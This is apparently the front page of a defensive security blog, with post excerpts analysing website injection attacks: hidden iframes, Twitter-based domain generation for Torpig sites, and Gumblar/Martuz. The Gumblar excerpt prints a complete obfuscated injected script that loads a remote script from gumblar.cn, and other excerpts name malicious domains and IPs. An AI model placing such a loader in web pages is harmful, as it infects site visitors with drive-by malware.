From Hidden Iframes to Obfuscated Scripts
In December, I noticed that ubiquitous hidden iframes that have been the prevailing site hack this year seemed to have gone. Unmask Parasites finds them on very few sites now. And even on infected sites, I see only old domains, while this attack is known for introducing at least one new domain every day and for frequently updating the iframe code on infected sites.
At the same time I noticed a new type of obfuscated scripts injected into hacked websites. And I believe it’s a new incarnation of the same attack that previously injected hidden iframes.
Here’s the story »»
Intermediaries to Torpig Attack Sites
In the previous post, I reviewed a website hack that injected malicious scripts that used Twitter API to generated domain names for attack sites. Domain names of the attack sites changed two times a day.
However since the malicious script works on the client side, the algorithm of the domain name generator can be easily extracted and used to predict upcoming malicious domains. To demonstrate this, I created my online “Torpig Domain Generator” that displays the currently used attack site and two domains of upcoming attack sites. It’s been working for mre than a week now and so far it is very accurate (For unknown reason hackers didn’t activate malicious domains this past Saturday, but infected sites still redirected to the same domains predicted by my generator.)
The fact that the algorithm is open and domain names of the upcoming malicious sites are known even before hackers register them means that any one who wants to stop the attack can pre-register those domains (so far it looks like no one have spare $20/day for this). The same algorithm can be used to proactively blacklist malicious domain names.
I’m sure hackers are aware of these downsides of open algorithms. Now they are trying to take advantage of the frequently changing pseudorandom domain names hiding the algorithm of the domain name generator behind intermediary servers-redirectors.
Here’s the story »»
Twitter API Still Attracts Hackers
A few weeks ago I blogged about hacked sites where malicious scripts used Twitter API to generate domains of new attack sites and trigger “drive-by” downloads.
As you might remember, I mentioned that the script was buggy (failed to work on certain days) and the approach didn’t look viable in the long term since it required that hackers manually register one new domain name every day. As a result, in November, this vector looked abandoned (I couldn’t find active and even registered malicious domains).
However, hackers seem to be die-hard fans of Twitter and don’t want to give up on the idea.
A few days ago I found a blacklisted site, where search.twitter.com was mentioned as an intermediary in malware distribution. Safe Browsing diagnostic pages also mentioned fresh (beginning of December) malicious domains that were definitely generated by the above-mentioned script. No wonder, on the infected site I found the familiar script. Actually, it was not the same script. It was an improved version of that script.
So what’s new? »»
Hackers Use Twitter API To Trigger Malicious Scripts
To improve my Unmask Parasites online service I regularly visit compromised sites and analyze malicious content cybercriminals inject into legitimate web pages. I have to admit that hackers are very creative and I learn new tricks every week.
Today, I’ve found an interesting obfuscated script that used Twitter API to trigger malicious process.
Here’s the story »»
Ncccnnnc .cn – Warning: Not Opera Only
This is just a quick post to let you know about a new type of server-wide script-injection attack I’ve just discovered.
I found this post on a phpBB forum and decided to check the infected site with Unmask Parasites. The tool reported a suspicious script:
Continue »»
Martuz .cn – New Incarnation of the Gumblar Exploit. So What’s New?
Gumblar is dead
Many people have noticed that “gumblar .cn” no longer resolve. The site cannot be accessed. Thus the gumblar script is no longer able to load the malicious payload and infect new computers and websites. Great!
Meet the Martuz
The loss of the gumblar .cn domain name can’t stop hackers. They have slightly modified the script and now inject a new version that loads malicious content from a new domain – martuz .cn (95 .129 .145 .58)
Continue »»
Gumblar .cn Exploit – 12 Facts About This Injected Script
I’ve been watching this exploit for about a week now. During the last couple of days it became the prevailing problem detected by Unmask Parasites.
I don’t have reliable information about how the infection occurs. However I have compiled a list of facts that might be useful if you are fighting this exploit.
1 Infected web pages contain a script that looks like this
(function(jil){var xR5p='%';e val(unescape(('var"20a"3d"22Sc"72iptEngin"65"22"2c"62"3d"22"56ers"69on()+"22"2c"6a"3d"22"22"2cu"3dnavig"61t"6fr"2e"75s"65rAgent"3bif(("75"2eind"65xOf"28"22Win"22)"3e0)"26"26(u"2e"69n"64exO"66("22NT"20"36"22"29"3c0)"26"26(documen"74"2ecookie"2e"69ndex"4f"66"28"22"6die"6b"3d1"22)"3c0)"26"26"28t"79"70e"6ff("7arvzts)"21"3dtypeof("22A"22))"29"7bzrvzts"3d"22A"22"3b"65va"6c("22if(wi"6edow"2e"22+a+"22"29j"3d"6a+"22+a+"22M"61jo"72"22+"62"2ba+"22Minor"22"2bb+a+"22B"75"69ld"22"2bb"2b"22j"3b"22)"3bdocu"6de"6e"74"2ewr"69"74e("22"3csc"72ipt"20sr"63"3d"2f"2fgumblar"2ecn"2frss"2f"3fid"3d"22+j+"22"3e"3c"5c"2f"73cript"3e"22"29"3b"7d').replace(jil,xR5p)))})(/"/g);
Continue »»
Gogo2me – Hidden IFrame Injection.
New Year has come with a new surge of website exploits. I see many help requests on BadwareBusters caused by the same problem.
Symptoms
- In Google search results, your site links are marked with a “This site may harm your computer” warning and you see an abrupt decrease in Google search traffic.
- When trying to open your web pages, users of Firefox 3 and Google Chrome browsers see a warning that your site is an “attack site”.
- If your site is registered with Google Webmaster Tools or AdWords, you receive an email from Google notifying that your site is a reported attack site and some of your web pages link to the following sites that host malicious software: 94 .247 .2 .0/ and gogo2me .net/
- Google’s Safe Browsing Diagnostics pages for your site also report that your site links to 94 .247 .2 .0/ and gogo2me .net/
About this blog
Occasional posts from the developer of
Unmask Parasites about things that hackers already know and site owners should know (if they don't want to be victims).
Exploit reviews, security tips, and all that jazz.
Recent Posts
Categories
- General (12)
- Tips and Tricks (8)
- Tweet Week (23)
- Unmask Parasites (7)
- Website exploits (38)
Recent Comments